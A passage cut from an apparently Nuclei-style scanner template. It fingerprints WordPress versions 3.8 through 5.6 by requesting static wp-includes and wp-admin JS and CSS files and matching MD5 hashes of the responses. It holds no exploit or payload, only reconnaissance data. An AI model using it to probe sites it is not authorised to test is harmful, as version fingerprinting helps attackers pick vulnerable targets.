"(\"01a78df6a74a122f060f9d09cce385f3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/nux/style.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"51e91a4aa751cd486eb1c5f4a90186f6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"4cf6bdba8a45c4c95790ffba417b4095\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"acaea46a81c4c475aff738dbab35dea9\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3f96e5de3731e81e254ad0804005dbf3\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"00b6d9456f13d06dc8d7ea4455e37069\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"65c0141abc2fe9d9bba8b5331c3274ec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/keycodes.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"4922391431de20246f0ce7a2d74043ec\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"d398b8fab3582fd237c150f65310747e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"64ab87f3071718276127e84f59778fad\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"094e9a4938e3845babaf160eacb7d657\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"48fd05b4c2627f3d3a48cfb98ed91356\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"099b33475e54c64309e7b9a5ebb5d092\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"eb49fabbe0dc208ace2eca6d108a5a63\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"cedaabb320bb1e0328e3f6cd45b60574\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/annotations.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"869b6589b93642d645a7ff94d34c9bcd\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"07e8500c949b1e53ed07759160193182\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1c8d75758692f38df662408bb0c46d13\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"54ba0b53e14340443743833e8b02af6f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e1bc9760ad82c3b9169ecabe8b535bba\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"22df64d39c77eb46745305cc79a1f8d9\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9e8dafcf437caed1c7d4145d23d3027b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"44dafed8854af59b0c02f93f172c4760\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/nux.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"58ca84c8a9864a3dc873fdc4c453f48b\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"80332405c607e928fa6a16de140aa4c5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"9916d74df1d25dc1cf23ee6645a1bb1f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b5b93be950c5d3a6e194e94cfdfbdcb5\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"4e0704461feab9e3bea09c010240945d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"39e8386e44bce82d81d29c8782a86994\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6caa763feddc6018d9f1ec6dfabe82d8\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2b69996f7b611c2961e41f80bf5c0220\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/date.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"09bd7ec81cc275569f740ca0947d7090\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"5d459e25af93fd190cbe45fe0393622a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"fe68c7cfe0cd91ae976ee9f1c593b538\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b43650e9707f46259c1588940adb3e0d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"3e8aefa8bd479feb0b73915bb0efa21b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5456867a601e6e6d63593fa18e24c3ee\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c21f513f4347eddbecbd26ee92176d7f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9e15b9968669f4f270a564b7884e8193\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/date.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"d2afab5af40ed42065d752c7be23a055\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"95a892f98c25fe1f4b577bd187db7dbf\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d6ffddf9882e571a9552423efefb67e9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e72b12ad40beea703e88b1f147df141e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c3c7d67bf8ad5e0c9ea514bb97cd5e1a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ef68dcd75662d8a6186bb74a73a2dce1\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5ccc243c7115d389be5056139dcd625a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8b69d11c1ddd6302e78055ec64161814\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/annotations.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"157003fc3dac9012c20621ee1b7a0c12\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"16dd6bf7592ecc3334fcda83d2b9a7a5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"dc558bf92a947005943cc5a6d86f65c9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b2761292ae7b37b2535c41d776576e6f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"fc378b756c507156d3bb57647a2fa305\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e7ffb528925a345287bf91fc1bfdc48c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"db814e86353b29081bab44e9ce633780\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"72e43256343bd24f7f7b1c84d911f752\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/nux.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"ea02e17cc487eecd2c884730ca83d19f\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"4da60c791df64a2f136d684b8c6a094c\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"92e4b04f1c3861f31bd7f3dd7a3b7afe\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"79fb8c5a535be1a6085cef841c12a1bc\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5e3a8dd193aba379149ae58ff4fcb7ad\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d01744b1e9eeb486e13f6e967d8e9adb\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"11453aa4f082dfb12090aa6a8134f083\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2306679567a599c1866e706a06a76670\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/keycodes.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"ca4ed904bbcce34e6346622f492a09b3\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"8984f96477ccd220c22d2798088414d1\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a4e82399a30c4e01d4ce7f1df5f8e6be\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b29b25b69e966f8e7d01ff3b0c33e487\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"17a7829459e9f1c0f0e9b623540b7e45\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8716957bb6d1b8fa50784c1c106a3eee\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"46cfbd1159b79fe5d623a7c4d69a215d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b3366fcfca15614a0632efa733534acd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/customize-widgets.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"038311fc7ba902f635d38d5856e4bd5f\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"06e1b9a8b892c70e1c85d6e71a818042\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"76e8fb3ef4bfc708d61dc8d384d15741\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"05121399e2e350d408b130348c895376\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4238613e5d0aac83303ec318675cb1f6\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"8969a60a3f0c741d9afea447d86d953d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ef95bf9c8588420084c724b541ec9fa0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"04051a3d44556bfa47c141f3dbbcf574\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"e4253b068d2423298be9024de455ce7a\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"5f456c32cef0c2d26594029014e40121\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"2724ee570a2716c8a7ad0436cb541e7c\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6da061fdd986c81610bab6ce0da32829\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"23e2b245228cfee7192b5a3fe31c0c91\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"ffd7aec63852caff436bc285577ecfa3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5e266e3c53ef66ec3fb3b5056f8b2089\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"41d27e52426e99a7d3266032ee77e1a6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"af50c512cb7c67e0ed118e63c7453e4a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/customize-widgets.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"fd98bf4be88830825dc122dd0175408e\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"da08d3e88ee6525511da0ca1518fef08\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"0aeb0d45bad4619ea1eaa727f841a356\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"ed7f5302d5bae6a9b6cd5a4d43bf78a9\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2a2b605aaa66b094f21ccad9f81f6967\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"abb5c6059429946e6df1524a068934ac\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"07f1519a2a074eb51cce3ec5cb9810d5\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"7850d87d05e8fce2ef72aa1dd954dc63\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"30816d081b666a1ac06ccca7bd335458\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ac59c76760d66a4135e7c66862b29de3\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"e92d16056260b9b00ff62ba8cf8ac956\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1138fc4ff0186ab65c201c1406c5488c\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"bc8ac6899320067cd086f03667306ecf\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2538bc7069ff25eba18dad8e31909458\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9397c78bbf00b486338b2b41d0749790\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f9f2d84bc27487c539cb01d6daad844b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d11098c05c2c0c794985feecc744d761\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog-rtl.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"10939ff6a3629fba80e30e2e7c526901\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"f4012995712fc1a153c6be91b0793944\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"81df1614adc93799fc9fd6b4b81c4633\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c28f6757fb9b072ed4ec796a96321e67\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"094685fe088942cb4b6c7dc87baea22f\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"4022062aa680d97c19101657ee855ab4\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"f805ee14b012822046c39857720dada6\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"927ba792f9f6603f5f8906f6084d50a6\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"61d8a3d3a6d658c14b3af6df9867c814\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"c6a6c86e7744eb9a44a85c796a2ee495\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"eeabb4ac70cad56aa0cadcd62a03d1af\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"61f6e02f97dc44c4e4f40edb42eff799\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ab51971b54ae780e5f7c6435241f384a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e845c325df4406c4f802e9a91156e27f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f330e24b85f0fa9184d3ce6ab3be05f3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/revisions-rtl.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"d2bb91a5e175182fd98b92423245b886\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"ab5cf43a981c0b4dcf4ca2812302dc6d\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"34105bf7fc640687204120141bae58c9\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"cc328e9ddbef2ef2c495786078ff612a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"376c100428103201b7109877a4afebae\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"48e4569b0d88ef4dc74f9fab6949dca3\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"cc920c884e073e24a57c407bf3f3e9dc\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"619351c3cdeabdd4ee466e303fade708\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"680ce200631f3e5cea718914a27f2b20\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"396d215094f1db66ef590df9ad2b58ef\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e5fdc24406fc3ac9f77cd9fdd04efde7\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"14180fbee1fff1db3412989150c0443b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c851fc6fbe4274e4e2bf73b2100a2f96\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"cabcd80e41e666e442604997c371fde5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4d39482cc996c858ca9d2a1bdf67e31a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/redux-routine.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"9edcaa09dfed88e54fbca308bfd5bd30\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"c16dec7246230269b58a03a97307c259\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"7a44fe509e3d08f766318638d81fa55d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8923ea20eee433c28a5d36f3e07dd5a5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0b2140c841b390907f4b88653b85bd22\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c8c2c6241f51ea5d30d1bbeb3505596a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"7066d794b635c1942e8eb7f239f1ffbc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/deprecated.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"9d288327c3cc35f46ee387ac35ce33d2\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2d6c78a8d8b0ff36f60a59959389ea06\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"bb93233b0856b933d5fed37eed889fc6\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"6b4d9b1bb83a32e0584a2d96813914d4\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"806f3624fe3764b82839575ba0d78215\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"8bd3f05802ff45dbb7caefe74ca9ac19\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"15d004e2a497bbb3415df4841ee3c287\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/html-entities.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6bc5679d9554f610fa802a700e4d2bb0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"add6f47cfd2143dc9b8ce1cf9d61fa1d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e83cc08139f59d9c7b2a844d0f157ae6\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"926549c2345d841c4e9aa846b47faf66\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"704aa3f780a4be1c5e1cdec6d12ebd58\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5e372785534afd708ecd06137104fd7a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3d019746602830edc76606593c6e78cb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/html-entities.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"5653e616ff072597049a986e94d1893d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"17a814289573e3266ce50763ba3d96e9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"4e1093a0eb3233815ff119a59aa3da12\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f9ac946bd43269e5d0096b2885a452c4\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ab30525b5a3d41679c37ceb0391da9b2\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c3460934c084a6f5ad1d6067ef4cf601\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"24ba24df2ddcd1a3ece0d53120599d70\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/redux-routine.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"a6f2946ff5131fb4149a5e31c1ef1620\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0cd45abb1d29b859766855e38ae523a6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"7afef25c194892b0cd2daa36dfcdcf2f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"330b275564eb0285afa4e176f92db068\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"cbf969c81590775351bdf3cbdb23dd8c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c8f64648dc07f6d88806eecf3f1d9171\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"265e120fcc08fd1d71c00b054c2ad6b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/dom-ready.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"9cdf2bc4e52829d46923c46a0c51b3d8\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"afeaf9138fd850772f230e0a45c88b17\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"362658e6685350fbd7085f492d41d2f0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"23250a9a6c2af1c80138657bc6580c75\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"cac6d5949b7c62e50ef4796c14190413\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3bacceecaca0f8a589dc42aa0b20bc4b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"623e83c4d16c6e8b4cbfc39fad5eb250\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/is-shallow-equal.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"0ddf6ee2668f5c4bd3c1d2d6cab397b4\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0fd621a526a3a22c990811e7f2452d00\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e6344716ad60939b279e71b39177359a\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5b6f24bca1ae714a09544545ecfa0591\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"62ad08977c7726bdecc27a2c5aae90aa\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"91a430c2d47f62111ad1dcef49602378\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"697dc948d7154a4de8dc89ff1eedc666\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/compose.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"d8938753827f30dbd34f1383cd339fff\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"3ec226880c9c7b212bea4e6b28bef494\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"48303ce765732dd6dec6002e9fb6c2b6\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"98dfd710199c77e9af13f78f26aa2ec9\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"91b64fc6a91c5a07074f910510359d7a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c011e24785102d27ae0303584fbd7f61\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c184f3a2648f4987470720f06836ed95\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/notices.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"17eeb174de4dc2cbbab3f4df5033d860\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"deb21fd1f49c4b7273ed16e27d1bdfb6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"57ec282267670a8099098c610c266afe\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"87401eac0344e7ccccf68ae898454158\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"76bbcc43a04f458c5de0bcdda3b6b2d2\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"ca0f216ae346da85031c47117c5110fd\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6347a5cc8ba70c6c00153843d0fe33c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/notices.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"a97eec74d9c0c50bf12be932ba1cc303\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"cb9b574dc9c6e136ef09ffffa8866b67\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"57f535968b993b74aaee4b2d6fc6b465\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5f1bee3c68fcb07418306a2010736746\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"15c08b66b7ff4019c5402d3d897ad52f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b164f09a93d3c5f52db6a7c6de3badb2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6b507c26a7c8df25e48ab5c68124fda5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/is-shallow-equal.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6f7824784191e6d2ce34292fd3b000af\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4784dae40cdab3b3843ba1d7f8604705\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"648aa419fdf18a5ab737dbbcd83c4201\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8a86cb6d7546fd3f89a1f5109c476a88\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c3d623f7027e378ad1acb574cc1eb2e8\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6f786f55902f42d508158386097b0e7d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3ced4b8cb966fdeb10870053a7158eca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/shortcode.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"40ed11fa6412995d2b8ec4668c512957\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8abc986b209c75fe69057f95edc3df78\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"9fd866d09fc09024aac82a01af9c2b04\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e096abf3375c18cd3c6842e92473d413\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"bc0717f0b100c9a56ae85fd646445118\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"689da769b1b1e825af1aed70cf3ac27e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"0c4bc0b7e6a7ee652d67338ee99b323c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/shortcode.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - 